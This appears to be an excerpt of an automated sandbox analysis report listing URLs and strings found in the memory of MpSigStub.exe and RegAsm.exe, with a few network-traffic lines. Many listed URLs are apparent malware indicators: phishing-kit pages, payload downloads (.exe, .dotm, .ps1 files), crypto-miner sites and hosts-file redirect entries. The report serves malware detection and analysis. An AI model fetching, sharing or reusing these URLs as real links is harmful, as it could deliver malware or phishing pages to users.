Source: MpSigStub.exe, 00000023.00000003.6340606272.0000028BD78F3000.00000004.00000001.sdmp	String found in binary or memory: https://web.certicamara.com/marco-legal0Z
Source: MpSigStub.exe, 00000023.00000003.6311413449.0000028BD79B9000.00000004.00000001.sdmp	String found in binary or memory: https://webmailx.space/ml/ama/4/excel/log.php
Source: MpSigStub.exe, 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmp	String found in binary or memory: https://world-wwt.com/wp-admin/css/colors/coffee/reportexcelnew.php
Source: MpSigStub.exe, 00000023.00000003.6324018589.0000028BD69FC000.00000004.00000001.sdmp	String found in binary or memory: https://www-cdn.getwebcake.com/
Source: MpSigStub.exe, 00000023.00000003.6430060790.0000028BD7CD0000.00000004.00000001.sdmp	String found in binary or memory: https://www.%s.com.br/
Source: MpSigStub.exe, 00000023.00000003.6429470799.0000028BD77A7000.00000004.00000001.sdmp	String found in binary or memory: https://www.4shared.com/download/pJhaizQgba/wd11.exe
Source: MpSigStub.exe, 00000023.00000003.6322023418.0000028BD7EF7000.00000004.00000001.sdmp	String found in binary or memory: https://www.4shared.com/downloadhelper/stat?type=%STATYPE%
Source: MpSigStub.exe, 00000023.00000003.6322023418.0000028BD7EF7000.00000004.00000001.sdmp	String found in binary or memory: https://www.4shared.com/downloadhelper/stat?type=%STATYPE%xc
Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmp	String found in binary or memory: https://www.4shared.com/web/directdownload/plcok719ce/hhnjnm.d9cc6b8210cf7f938818851
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: https://www.admos-gleitlager.de/feed/
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: https://www.advokathuset.dk/auktioner/tvangsauktioner/saadan-koeber-du-paa-tvangsauktion
Source: MpSigStub.exe, 00000023.00000003.6325684988.0000028BD66A2000.00000004.00000001.sdmp	String found in binary or memory: https://www.aec.com.my/aec_5.5/public/ph/h/page.php
Source: MpSigStub.exe, 00000023.00000003.6435757961.0000028BD7C8D000.00000004.00000001.sdmp	String found in binary or memory: https://www.africafooddistribution.com/wp-content/themes/topxoh/sloch/index.php
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: https://www.anca-aste.it/uploads/form/boeing_spe_leos_logo.jpg
Source: MpSigStub.exe, 00000023.00000003.6346459854.0000028BD6536000.00000004.00000001.sdmp	String found in binary or memory: https://www.anf.es/AC/ACTAS/789230
Source: MpSigStub.exe, 00000023.00000003.6346459854.0000028BD6536000.00000004.00000001.sdmp	String found in binary or memory: https://www.anf.es/AC/ANFServerCA.crl0
Source: MpSigStub.exe, 00000023.00000003.6346459854.0000028BD6536000.00000004.00000001.sdmp	String found in binary or memory: https://www.anf.es/address/)1(0&
Source: MpSigStub.exe, 00000023.00000003.6338116203.0000028BD7305000.00000004.00000001.sdmp	String found in binary or memory: https://www.anthonyshandyman.com/irn/toolzlord.php
Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp	String found in binary or memory: https://www.apple.com/appleca/0
Source: MpSigStub.exe, 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmp	String found in binary or memory: https://www.arm-mn.com/wp-content/themes/bb-theme/classes/msg.jpg
Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmp	String found in binary or memory: https://www.astedams.it/uploads/frame/61.dotm
Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmp	String found in binary or memory: https://www.astedams.it/uploads/template/17.dotm
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: https://www.augenta.com/site/xmlrpc.php
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: https://www.autopfand24.de/pfandhaus-in-meiner-naehe/
Source: MpSigStub.exe, 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmp	String found in binary or memory: https://www.bancanetempresarial.banamex
Source: MpSigStub.exe, 00000023.00000003.6430356442.0000028BD7C4C000.00000004.00000001.sdmp, MpSigStub.exe, 00000023.00000003.6283306166.0000028BD6B04000.00000004.00000001.sdmp	String found in binary or memory: https://www.bitly.com/
Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmp	String found in binary or memory: https://www.bitly.com/bug41
Source: MpSigStub.exe, 00000023.00000003.6320629595.0000028BD71FC000.00000004.00000001.sdmp	String found in binary or memory: https://www.bizsonet.com/wp-admin/js/jquery
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: https://www.botanicinnovations.com/wp-admin/admin-ajax.php
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: https://www.brawnmediany.com
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: https://www.cactusthebrand.com/xmlrpc.php
Source: MpSigStub.exe, 00000023.00000003.6301031977.0000028BD6979000.00000004.00000001.sdmp	String found in binary or memory: https://www.ccleaner.com/inapp/installerofferpage
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: https://www.coastalbridgeadvisors.com
Source: MpSigStub.exe, 00000023.00000003.6319059958.0000028BD62F3000.00000004.00000001.sdmp	String found in binary or memory: https://www.cogmobile.com/next1.php
Source: MpSigStub.exe, 00000023.00000003.6338116203.0000028BD7305000.00000004.00000001.sdmp	String found in binary or memory: https://www.coinblind.com/lib/coinblind_beta.js
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: https://www.creamery201.com/
Source: MpSigStub.exe, 00000023.00000003.6290146708.0000028BD5FA2000.00000004.00000001.sdmp	String found in binary or memory: https://www.dfib.net/calc.exe
Source: MpSigStub.exe, 00000023.00000003.6347031294.0000028BD72C3000.00000004.00000001.sdmp	String found in binary or memory: https://www.digicert.com/CPS0
Source: MpSigStub.exe, 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmp	String found in binary or memory: https://www.divera.nl/wp-content/themes/flexfit/framework/css/font/gr
Source: MpSigStub.exe, 00000023.00000003.6299498937.0000028BD6FED000.00000004.00000001.sdmp	String found in binary or memory: https://www.doganturan.av.tr/wp-admin/alu/reportdhlnew2.php
Source: MpSigStub.exe, 00000023.00000003.6315879958.0000028BD6D14000.00000004.00000001.sdmp	String found in binary or memory: https://www.doganturan.av.tr/wp-admin/bigi/reportdhlnew2.php
Source: MpSigStub.exe, 00000023.00000003.6309579817.0000028BD8040000.00000004.00000001.sdmp, MpSigStub.exe, 00000023.00000003.6338116203.0000028BD7305000.00000004.00000001.sdmp	String found in binary or memory: https://www.dropbox.com/
Source: MpSigStub.exe, 00000023.00000003.6438080287.0000028BD7556000.00000004.00000001.sdmp	String found in binary or memory: https://www.dropbox.com/s/
Source: MpSigStub.exe, 00000023.00000003.6320629595.0000028BD71FC000.00000004.00000001.sdmp	String found in binary or memory: https://www.dropbox.com/s/41zf98knyy5atko/001_01.ps1?dl
Source: MpSigStub.exe, 00000023.00000003.6320629595.0000028BD71FC000.00000004.00000001.sdmp	String found in binary or memory: https://www.dropbox.com/s/dh8flnrogfq1h1w/001.ps1?dl
Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmp	String found in binary or memory: https://www.dropbox.com/s/dmprbq9mxwylpht/zs437zfig68f.doc?dl=1
Source: MpSigStub.exe, 00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmp	String found in binary or memory: https://www.dropbox.com/s/foughx315flj51u/worddata.dotm?dl=1
Source: MpSigStub.exe, 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmp	String found in binary or memory: https://www.dropbox.com/s/jxfyg8a6oj13z7i/factuur%20006643-89845.zip
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: https://www.dropbox.com/s/r9xrl3meju6lr19/payment_advice.uue?dl=1)
Source: MpSigStub.exe, 00000023.00000003.6283884268.0000028BD64D2000.00000004.00000001.sdmp	String found in binary or memory: https://www.e-gold.com
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	String found in binary or memory: https://www.e-gold.com/
Source: MpSigStub.exe, 00000023.00000003.6319059958.0000028BD62F3000.00000004.00000001.sdmp	String found in binary or memory: https://www.e-gold.com/acct/
Source: MpSigStub.exe, 00000023.00000003.6283884268.0000028BD64D2000.00000004.00000001.sdmp	String found in binary or memory: https://www.e-gold.com/acct/accountinfo.asp
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	String found in binary or memory: https://www.e-gold.com/acct/ai.asp?c=AS
Source: MpSigStub.exe, 00000023.00000003.6283884268.0000028BD64D2000.00000004.00000001.sdmp	String found in binary or memory: https://www.e-gold.com/acct/verify.asp
Source: MpSigStub.exe, 00000023.00000003.6283884268.0000028BD64D2000.00000004.00000001.sdmp	String found in binary or memory: https://www.e-gold.com/acct/verify.asp&BAction=
Source: MpSigStub.exe, 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmp	String found in binary or memory: https://www.econoticias.com.bo/aa/excel.php
Source: MpSigStub.exe, 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmp	String found in binary or memory: https://www.econoticias.com.bo/bb/excel.php
Source: MpSigStub.exe, 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmp	String found in binary or memory: https://www.econoticias.com.bo/cc/excel.php
Source: MpSigStub.exe, 00000023.00000003.6335572342.0000028BD6FAA000.00000004.00000001.sdmp	String found in binary or memory: https://www.elcom.admin.ch
Source: MpSigStub.exe, 00000023.00000003.6422489024.0000028BD6EA1000.00000004.00000001.sdmp	String found in binary or memory: https://www.emergencydentistlondonpro.co.uk/hddu2vgb7muait.php
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: https://www.escrowprotects.com/share
Source: MpSigStub.exe, 00000023.00000003.6288686675.0000028BD7BA5000.00000004.00000001.sdmp	String found in binary or memory: https://www.exploit-db.com/exploits/39719/
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	String found in binary or memory: https://www.fabianiarte.com/uploads/imgup/
Source: MpSigStub.exe, 00000023.00000003.6326014719.0000028BD66E4000.00000004.00000001.sdmp, MpSigStub.exe, 00000023.00000003.6326794298.0000028BD64F4000.00000004.00000001.sdmp	String found in binary or memory: https://www.fastsupport.com
Source: MpSigStub.exe, 00000023.00000003.6434103017.0000028BD7BC7000.00000004.00000001.sdmp	String found in binary or memory: https://www.fastsupport.com/
Source: MpSigStub.exe, 00000023.00000003.6280803860.0000028BD7E31000.00000004.00000001.sdmp	String found in binary or memory: https://www.finance-portal.basf.net/portal
Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	String found in binary or memory: https://www.flexdirect.adp.com/client/login.aspx
Source: MpSigStub.exe, 00000023.00000003.6264075284.0000028BD8107000.00000004.00000001.sdmp	String found in binary or memory: https://www.formtools.com/f/micr0soft0ffice365mail
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: https://www.fotoideaymedia.es/wp-content/themes/fotoideaymedia2017/css/reset.css
Source: MpSigStub.exe, 00000023.00000003.6313262116.0000028BD723F000.00000004.00000001.sdmp	String found in binary or memory: https://www.freecontent.bid./cpcu.js
Source: MpSigStub.exe, 00000023.00000003.6282670643.0000028BD7070000.00000004.00000001.sdmp	String found in binary or memory: https://www.google-analytics.com/j/collect.
Source: MpSigStub.exe, 00000023.00000003.6313262116.0000028BD723F000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com
Source: MpSigStub.exe, 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com.tr/
Source: MpSigStub.exe, 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/
Source: MpSigStub.exe, 00000023.00000003.6292767693.0000028BD7F7B000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/accounts/servicelogin
Source: MpSigStub.exe, 00000023.00000003.6307279106.0000028BD6061000.00000004.00000001.sdmp	String found in binary or memory: https://www.gottalife.net/wp-content/plugins/seo_index/evt8tkbsidbqf.php
Source: MpSigStub.exe, 00000023.00000003.6422489024.0000028BD6EA1000.00000004.00000001.sdmp	String found in binary or memory: https://www.gqtoronto.com/live/excelzz/index.php?email=
Source: MpSigStub.exe, 00000023.00000003.6436760184.0000028BD67ED000.00000004.00000001.sdmp	String found in binary or memory: https://www.gynfit2019.com.br/fotos.jpg
Source: MpSigStub.exe, 00000023.00000003.6313262116.0000028BD723F000.00000004.00000001.sdmp	String found in binary or memory: https://www.hashing.win/scripts/min.js
Source: MpSigStub.exe, 00000023.00000003.6320629595.0000028BD71FC000.00000004.00000001.sdmp	String found in binary or memory: https://www.hashing.win/t5s0.js
Source: MpSigStub.exe, 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmp	String found in binary or memory: https://www.horizon-sun.com/po/mailbox/rectify/sys-admin-9-0-4-7/repair-00-4/1159.php
Source: MpSigStub.exe, 00000023.00000003.6429782920.0000028BD77E9000.00000004.00000001.sdmp	String found in binary or memory: https://www.icq.com/people/
Source: MpSigStub.exe, 00000023.00000003.6318934861.0000028BD62E5000.00000004.00000001.sdmp	String found in binary or memory: https://www.ijsiodjfo.ml/index.php?user=
Source: MpSigStub.exe, 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmp	String found in binary or memory: https://www.ijtra.com/pear/docs/structures_graph/docs/html/media/tito/po.htm
Source: MpSigStub.exe, 00000023.00000003.6438080287.0000028BD7556000.00000004.00000001.sdmp	String found in binary or memory: https://www.instagram.com/
Source: MpSigStub.exe, 00000023.00000003.6339973088.0000028BD6769000.00000004.00000001.sdmp	String found in binary or memory: https://www.kbtseafood.com/wp-content/uploads/2019/07/JTGUJRDPX.res
Source: MpSigStub.exe, 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmp	String found in binary or memory: https://www.listrikindo.com/templates/vinye/wp-content/themes/jamo/order1.doc
Source: MpSigStub.exe, 00000023.00000003.6301031977.0000028BD6979000.00000004.00000001.sdmp	String found in binary or memory: https://www.llotytue.gq/index.php?user=
Source: MpSigStub.exe, 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmp	String found in binary or memory: https://www.luongynhiem.com/wp-content/themes/sahifa/js/msg.jpg
Source: MpSigStub.exe, 00000023.00000003.6317125613.0000028BD6C91000.00000004.00000001.sdmp	String found in binary or memory: https://www.maan2u.com/alls.txt
Source: MpSigStub.exe, 00000023.00000003.6311571113.0000028BD79D4000.00000004.00000001.sdmp	String found in binary or memory: https://www.managuytakayama.com/purchases
Source: MpSigStub.exe, 00000023.00000003.6438080287.0000028BD7556000.00000004.00000001.sdmp	String found in binary or memory: https://www.marriott.com
Source: MpSigStub.exe, 00000023.00000003.6295888912.0000028BD60A3000.00000004.00000001.sdmp	String found in binary or memory: https://www.miracleworkstudios.com/wp-content/uploads/2019/12/app/
Source: MpSigStub.exe, 00000023.00000003.6436106917.0000028BD69FC000.00000004.00000001.sdmp	String found in binary or memory: https://www.monconcept-renovation.fr/wp-admin/network/msci.exe
Source: MpSigStub.exe, 00000023.00000003.6422489024.0000028BD6EA1000.00000004.00000001.sdmp	String found in binary or memory: https://www.moverandpackermvp.com/hindustan/scan/
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: https://www.nachhilfe-unterricht.com/wp-content/cache/autoptimize/css/autoptimize_018281502668e27604
Source: MpSigStub.exe, 00000023.00000003.6435757961.0000028BD7C8D000.00000004.00000001.sdmp	String found in binary or memory: https://www.nathiagali.com/wp-includes/phpmailer/fmupdates/next.php
Source: MpSigStub.exe, 00000023.00000003.6435757961.0000028BD7C8D000.00000004.00000001.sdmp	String found in binary or memory: https://www.nathiagali.com/wp-includes/pomo/s2/danielmccarthy.php
Source: MpSigStub.exe, 00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmp	String found in binary or memory: https://www.ne-ba.org/files/gallery/images/bae_ecs_epm.jpg
Source: MpSigStub.exe, 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmp	String found in binary or memory: https://www.nextrecruitment.ro//pdd/sfexpress/index.php?email=hiroyuki.ume.zh
Source: MpSigStub.exe, 00000023.00000003.6435347740.0000028BD7C0A000.00000004.00000001.sdmp	String found in binary or memory: https://www.notion.so/ce3baa2cd5ec4f4eab00575f5ae423e8
Source: MpSigStub.exe, 00000023.00000003.6267925507.0000028BD6E61000.00000004.00000001.sdmp	String found in binary or memory: https://www.objectiveline.com/tt-onedrive/sugar.php
Source: MpSigStub.exe, 00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmp	String found in binary or memory: https://www.oratoriostsurukyo.com.br/arquivos/teste.hta
Source: MpSigStub.exe, 00000023.00000003.6430060790.0000028BD7CD0000.00000004.00000001.sdmp	String found in binary or memory: https://www.palmtipsheet.com/wp-content/calc1.exe
Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmp	String found in binary or memory: https://www.pamelamann.co.za/1/shola/doc/purchase.doc
Source: MpSigStub.exe, 00000023.00000003.6438080287.0000028BD7556000.00000004.00000001.sdmp	String found in binary or memory: https://www.paypal.com
Source: MpSigStub.exe, 00000023.00000003.6338449567.0000028BD8082000.00000004.00000001.sdmp	String found in binary or memory: https://www.piriform.com/inapp/installerofferpage
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: https://www.pmc-services.de
Source: MpSigStub.exe, 00000023.00000003.6266507875.0000028BD63ED000.00000004.00000001.sdmp	String found in binary or memory: https://www.protectalaskasfuture.com/wp-content/upgrade/new.php
Source: MpSigStub.exe, 00000023.00000003.6300664525.0000028BD7A3C000.00000004.00000001.sdmp	String found in binary or memory: https://www.realvnc.com
Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmp	String found in binary or memory: https://www.sanlorenzoyacht.com/newsl/uploads/docs/43.dotm
Source: MpSigStub.exe, 00000023.00000003.6301785848.0000028BD7C0A000.00000004.00000001.sdmp	String found in binary or memory: https://www.slgroupsrl.com/vendo
Source: MpSigStub.exe, 00000023.00000003.6300664525.0000028BD7A3C000.00000004.00000001.sdmp	String found in binary or memory: https://www.spectrumhosting.co.za/hello-3.wav
Source: MpSigStub.exe, 00000023.00000003.6335925716.0000028BD63AB000.00000004.00000001.sdmp	String found in binary or memory: https://www.sugarsync.com/pf
Source: MpSigStub.exe, 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmp	String found in binary or memory: https://www.tamim.pro/wp-content/themes/beonepage-pro/languages/msg.j
Source: MpSigStub.exe, 00000023.00000003.6326014719.0000028BD66E4000.00000004.00000001.sdmp	String found in binary or memory: https://www.teamviewer.com
Source: MpSigStub.exe, 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmp	String found in binary or memory: https://www.tecel.cl/.well-known/frank/next.php
Source: MpSigStub.exe, 00000023.00000003.6315879958.0000028BD6D14000.00000004.00000001.sdmp	String found in binary or memory: https://www.tecel.cl/content/ak/next.php
Source: MpSigStub.exe, 00000023.00000003.6322660545.0000028BD67AB000.00000004.00000001.sdmp	String found in binary or memory: https://www.thegoodplan.ovh/promo.php
Source: RegAsm.exe, 0000000A.00000002.7244913734.000000001E201000.00000004.00000001.sdmp	String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
Source: MpSigStub.exe, 00000023.00000003.6282961298.0000028BD6AC6000.00000004.00000001.sdmp	String found in binary or memory: https://www.threadpaints.com/js/status.js
Source: MpSigStub.exe, 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmp	String found in binary or memory: https://www.torproject.org/download/
Source: MpSigStub.exe, 00000023.00000003.6430060790.0000028BD7CD0000.00000004.00000001.sdmp	String found in binary or memory: https://www.tsuburaya-prod.co.jp/wp-content/plugins/wp-ogp/sa.exe
Source: MpSigStub.exe, 00000023.00000003.6422489024.0000028BD6EA1000.00000004.00000001.sdmp	String found in binary or memory: https://www.ultimateislandguide.com//cache/.p/next.php
Source: MpSigStub.exe, 00000023.00000003.6436760184.0000028BD67ED000.00000004.00000001.sdmp, MpSigStub.exe, 00000023.00000003.6339082124.0000028BD7EB5000.00000004.00000001.sdmp	String found in binary or memory: https://www.upload.ee/
Source: MpSigStub.exe, 00000023.00000003.6436106917.0000028BD69FC000.00000004.00000001.sdmp	String found in binary or memory: https://www.upload.ee/download/
Source: MpSigStub.exe, 00000023.00000003.6315879958.0000028BD6D14000.00000004.00000001.sdmp	String found in binary or memory: https://www.vacsax.co.uk/wp-admin/mile/graceserver.php
Source: MpSigStub.exe, 00000023.00000003.6341363005.0000028BD7DAE000.00000004.00000001.sdmp	String found in binary or memory: https://www.vespang.cf/ideshow/
Source: MpSigStub.exe, 00000023.00000003.6346459854.0000028BD6536000.00000004.00000001.sdmp	String found in binary or memory: https://www.vespang.cf/ideshow/post.php
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: https://www.yaplakal.com/go/?https://yothuful-lichretman-bboae1.netlify.app#juangondo
Source: MpSigStub.exe, 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmp	String found in binary or memory: https://www.zimsgizmos.biz/wp-content/themes/zgf/images/headers/hp.gf
Source: MpSigStub.exe, 00000023.00000003.6310448430.0000028BD6169000.00000004.00000001.sdmp	String found in binary or memory: https://www2.bancobrasil.com.br/
Source: MpSigStub.exe, 00000023.00000003.6267925507.0000028BD6E61000.00000004.00000001.sdmp	String found in binary or memory: https://xf.zp-inwsice.online/?e=claire
Source: MpSigStub.exe, 00000023.00000003.6439110180.0000028BD7F7A000.00000004.00000001.sdmp	String found in binary or memory: https://xmr-services.tk/
Source: MpSigStub.exe, 00000023.00000003.6340606272.0000028BD78F3000.00000004.00000001.sdmp	String found in binary or memory: https://xmrig.com/docs/algorithms
Source: MpSigStub.exe, 00000023.00000003.6264485610.0000028BD7D13000.00000004.00000001.sdmp	String found in binary or memory: https://xmrig.com/wizard
Source: MpSigStub.exe, 00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmp	String found in binary or memory: https://xtronbikewear.co.uk/gt/dhl_topscript/source/index.php
Source: MpSigStub.exe, 00000023.00000003.6267925507.0000028BD6E61000.00000004.00000001.sdmp	String found in binary or memory: https://xw.kh-imoice.online/?e=info
Source: MpSigStub.exe, 00000023.00000003.6335572342.0000028BD6FAA000.00000004.00000001.sdmp	String found in binary or memory: https://y/ews/Exchange.asmx
Source: MpSigStub.exe, 00000023.00000003.6291965399.0000028BD7440000.00000004.00000001.sdmp	String found in binary or memory: https://yerl.org/
Source: MpSigStub.exe, 00000023.00000003.6319059958.0000028BD62F3000.00000004.00000001.sdmp	String found in binary or memory: https://ygmservices.com/
Source: MpSigStub.exe, 00000023.00000003.6436106917.0000028BD69FC000.00000004.00000001.sdmp	String found in binary or memory: https://yoga.webnatico.com/wp-admin/maint/msci.exe
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: https://youc1000.com/f.html#/ywxsaxnvbi5ly2tszxlay3nnas5jb20=
Source: MpSigStub.exe, 00000023.00000003.6267925507.0000028BD6E61000.00000004.00000001.sdmp	String found in binary or memory: https://zk.fx-invoice.online/?e=info

Source: unknown

DNS traffic detected: queries for: drive.google.com

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 443

Source: RegAsm.exe, 0000000A.00000002.7245837734.000000001E28E000.00000004.00000001.sdmp	String found in binary or memory: subdomain_match":["go","tv"]},{"applied_policy":"EdgeUA","domain":"video.zhihu.com"},{"applied_policy":"ChromeUA","domain":"la7.it"},{"applied_policy":"ChromeUA","domain":"ide.cs50.io"},{"applied_policy":"ChromeUA","domain":"moneygram.com"},{"applied_policy":"ChromeUA","domain":"blog.esuteru.com"},{"applied_policy":"ChromeUA","domain":"online.tivo.com","path_match":["/start"]},{"applied_policy":"ChromeUA","domain":"smallbusiness.yahoo.com","path_match":["/businessmaker"]},{"applied_policy":"ChromeUA","domain":"jeeready.amazon.in","path_match":["/home"]},{"applied_policy":"ChromeUA","domain":"abc.com"},{"applied_policy":"ChromeUA","domain":"mvsrec738.examly.io"},{"applied_policy":"ChromeUA","domain":"myslate.sixphrase.com"},{"applied_policy":"ChromeUA","domain":"search.norton.com","path_match":["/nsssOnboarding"]},{"applied_policy":"ChromeUA","domain":"checkdecide.com"},{"applied_policy":"ChromeUA","domain":"virtualvisitlogin.partners.org"},{"applied_policy":"ChromeUA","domain":"carelogin.bryantelemedicine.com"},{"applied_policy":"ChromeUA","domain":"providerstc.hs.utah.gov"},{"applied_policy":"ChromeUA","domain":"applychildcaresubsidy.alberta.ca"},{"applied_policy":"ChromeUA","domain":"elearning.evn.com.vn","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"telecare.keckmedicine.org"},{"applied_policy":"ChromeUA","domain":"authoring.amirsys.com","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"elearning.seabank.com.vn","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"app.fields.corteva.com","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"gsq.minornet.com"},{"applied_policy":"ChromeUA","domain":"shop.lic.co.nz"},{"applied_policy":"ChromeUA","domain":"telehealthportal.uofuhealth.org"},{"applied_policy":"ChromeUA","domain":"portal.centurylink.com"},{"applied_policy":"ChromeUA","domain":"visitnow.org"},{"applied_policy":"ChromeUA","domain":"www.hotstar.com","path_match":["/in/subscribe/payment/methods/dc","/in/subscribe/payment/methods/cc"]},{"applied_policy":"ChromeUA","domain":"tryca.st","path_match":["/studio","/publisher"]},{"applied_policy":"ChromeUA","domain":"telemost.yandex.ru"},{"applied_policy":"ChromeUA","domain":"astrogo.astro.com.my"},{"applied_policy":"ChromeUA","domain":"airbornemedia.gogoinflight.com"},{"applied_policy":"ChromeUA","domain":"itoaxaca.mindbox.app"},{"applied_policy":"ChromeUA","domain":"app.classkick.com"},{"applied_policy":"ChromeUA","domain":"exchangeservicecenter.com","path_match":["/freeze"]},{"applied_policy":"ChromeUA","domain":"bancodeoccidente.com.co","path_match":["/portaltransaccional"]},{"applied_policy":"ChromeUA","domain":"better.com"},{"applied_policy":"IEUA","domain":"bm.gzekao.cn","path_match":["/tr/webregister/"]},{"applied_policy":"ChromeUA","domain":"scheduling.care.psjhealth.org","path_match":["/virtual"]},{"applied_policy":"ChromeUA","domain":"salud.go.cr"},{"applied_policy":"ChromeUA","domain":"learning.chungdahm.com"},{"applied_policy":"C
Source: MpSigStub.exe, 00000023.00000003.6319059958.0000028BD62F3000.00000004.00000001.sdmp	String found in binary or memory: www.yahoo.com/www.google.com/] equals www.yahoo.com (Yahoo)
Source: MpSigStub.exe, 00000023.00000003.6430356442.0000028BD7C4C000.00000004.00000001.sdmp	String found in binary or memory: "http://www.youtube.com/watch?v=nqpod5at30g" equals www.youtube.com (Youtube)
Source: MpSigStub.exe, 00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmp	String found in binary or memory: .src='http://www.facebook.com/plugins/like.php?href='+encodeuricomponent( equals www.facebook.com (Facebook)
Source: MpSigStub.exe, 00000023.00000003.6338116203.0000028BD7305000.00000004.00000001.sdmp	String found in binary or memory: 4src='http://www.facebook.com/plugins/like.php?href equals www.facebook.com (Facebook)
Source: MpSigStub.exe, 00000023.00000003.6338116203.0000028BD7305000.00000004.00000001.sdmp	String found in binary or memory: 4src='http://www.facebook.com/widgets/like.php?href equals www.facebook.com (Facebook)
Source: MpSigStub.exe, 00000023.00000003.6438080287.0000028BD7556000.00000004.00000001.sdmp	String found in binary or memory: 67.213.219.238www.youtube.com67.213.219.238ph.yahoo.com/?p=us127.0.0.1http://www.search.ask.com equals www.yahoo.com (Yahoo)
Source: MpSigStub.exe, 00000023.00000003.6438080287.0000028BD7556000.00000004.00000001.sdmp	String found in binary or memory: 67.213.219.238www.youtube.com67.213.219.238ph.yahoo.com/?p=us127.0.0.1http://www.search.ask.com equals www.youtube.com (Youtube)
Source: MpSigStub.exe, 00000023.00000003.6295888912.0000028BD60A3000.00000004.00000001.sdmp	String found in binary or memory: :127.0.0.1 www.login.yahoo.com equals www.yahoo.com (Yahoo)
Source: MpSigStub.exe, 00000023.00000003.6295888912.0000028BD60A3000.00000004.00000001.sdmp	String found in binary or memory: <127.0.0.1 www.search.yahoo.com equals www.yahoo.com (Yahoo)
